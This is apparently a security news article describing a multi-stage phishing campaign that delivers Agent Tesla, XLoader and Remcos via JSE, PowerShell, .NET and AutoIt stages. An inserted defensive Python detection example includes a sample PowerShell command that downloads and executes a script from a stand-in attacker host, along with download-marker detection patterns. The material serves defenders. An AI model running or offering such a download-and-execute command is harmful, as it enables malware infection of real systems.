Thursday, May 8, 2025

Threat Actors Leverage Cascading Shadows Attack Chain to Evade Detection and Hinder Analysis


A sophisticated multi-layered phishing campaign was uncovered, employing a complex attack chain known as “Cascading Shadows” to deliver various malware, including Agent Tesla, XLoader, and Remcos RAT.

The attackers’ strategy hinges on multiple, individually simple but deliberately layered stages, which not only evade traditional sandbox environments but also complicate analysis by security researchers.

The Deceptive Prelude

The campaign begins with phishing emails disguised as official communications, typically claiming a new payment has been made.


These emails contain a compressed file named “doc00290320092.7z”, directing the victim to review an ‘order file’.

Figure: Attack chain used for this campaign.

Once opened, the .7z file reveals a JavaScript encoded (.jse) file. This initial file acts as a downloader, fetching a PowerShell script from a remote server, initiating the infection chain.

Unraveling the Layers

The PowerShell script, devoid of heavy obfuscation, hosts a Base64-encoded payload which is decoded, saved to disk, and executed.

Interestingly, subsequent analysis has revealed that the payload varies: it is either a .NET executable or an AutoIt-compiled executable.

According to the Report, this bifurcation in the attack chain allows the malware to adapt, choosing between paths to increase infection success.

The .NET executable decrypts the payload, either with AES or Triple DES, before injecting it into a running RegAsm.exe process.

Similarities found in multiple .NET samples from this campaign indicate a deliberate design to inject different malware families, like Agent Tesla or XLoader, into running processes, leveraging the same underlying infection method.

On the alternative path, AutoIt executables introduce an additional layer of complexity.

They contain encrypted payloads that load shellcode, which, once decrypted, injects the final malware into a RegSvcs process.

The AutoIt script also runs the malicious code through DLLCALLADDRESS references, which complicates static analysis and debugging.
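The chain described above (script host launching a PowerShell downloader, PowerShell dropping and running a decoded payload from a user-writable path, and that payload spawning RegAsm.exe or RegSvcs.exe as an injection target) gives a defender three parent/child relationships to hunt for. The following Python is an added example, not code from the original article or from Unit 42; the process-creation events, paths, and URL are constructed, and the stage names are assumptions chosen for this illustration.

```python
import ntpath
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (not real telemetry). They model
# the chain described above: script host -> PowerShell download -> dropped payload -> RegAsm.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString('https://attacker.example/stage2.ps1'))"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\payload.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\payload.exe"},
    {"parent": r"C:\Users\alice\AppData\Local\Temp\payload.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"parent": r"C:\Windows\explorer.exe",  # benign: ordinary installer launch, must not match
     "image": r"C:\Program Files\Contoso\setup.exe",
     "cmdline": r"C:\Program Files\Contoso\setup.exe /quiet"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # hosts that run .jse files
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "http")
INJECTION_TARGETS = {"regasm.exe", "regsvcs.exe"}      # .NET utilities abused as injection targets
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

def _base(path: str) -> str:
    return ntpath.basename(path).lower()

def _user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)

def classify(ev: Dict[str, str]) -> str:
    """Return the chain stage an event matches, or '' if it does not match any."""
    parent, image, cmd = _base(ev["parent"]), _base(ev["image"]), ev["cmdline"].lower()
    if parent in SCRIPT_HOSTS and image == "powershell.exe" and any(m in cmd for m in DOWNLOAD_MARKERS):
        return "script_host_to_powershell_download"
    if parent == "powershell.exe" and _user_writable(ev["image"]):
        return "powershell_drops_and_runs_payload"
    # RegAsm/RegSvcs are normally started by installers; a parent in a user-writable path is the signal.
    if image in INJECTION_TARGETS and _user_writable(ev["parent"]):
        return "dotnet_utility_spawned_from_user_path"
    return ""

def detect(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, stage) for every event that matches a stage of the chain."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]

if __name__ == "__main__":
    for idx, stage in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {stage}")
```

Each rule alone will fire on some legitimate activity; the value is in correlating all three stages within one process tree on one host.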

Despite the attackers’ intricate strategies, security solutions like Advanced WildFire can detect each stage of the Cascading Shadows attack chain.

Figure: AutoIt script extracted by WildFire.

Palo Alto Networks’ Advanced URL Filtering, Advanced DNS Security, and Cortex XDR with XSIAM provide layered defenses against these threats.

For organizations potentially compromised, immediate contact with Unit 42 Incident Response is recommended.

This attack chain highlights a continuing trend in cyber threats, where attackers rely on complexity and variety rather than sophisticated obfuscation to evade detection.

The analyzed techniques offer crucial insights for enhancing threat hunting capabilities, particularly in dealing with AutoIt-based malware and debugging shellcode.

This analysis underscores the perpetual cat-and-mouse game between cyber defenders and attackers, showcasing the need for constant vigilance and advanced detection capabilities.

Indicators of Compromise



Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
